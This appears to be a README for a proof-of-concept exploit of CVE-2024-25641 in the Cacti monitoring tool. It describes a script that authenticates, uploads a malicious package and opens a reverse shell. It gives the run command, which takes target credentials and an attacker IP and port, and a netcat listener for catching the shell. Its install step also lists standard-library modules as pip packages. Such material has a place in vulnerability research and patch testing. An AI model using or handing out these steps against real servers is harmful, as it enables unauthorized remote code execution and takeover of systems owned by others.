This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.
- Python 3.x
requests
libraryargparse
libraryre
library
You can install the required Python library using pip3:
pip3 install requests
pip3 install argparse
pip3 install re
(make sure to place the test.xml.gz in the same directory as the exploit.py)
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
nc -nvlp <port>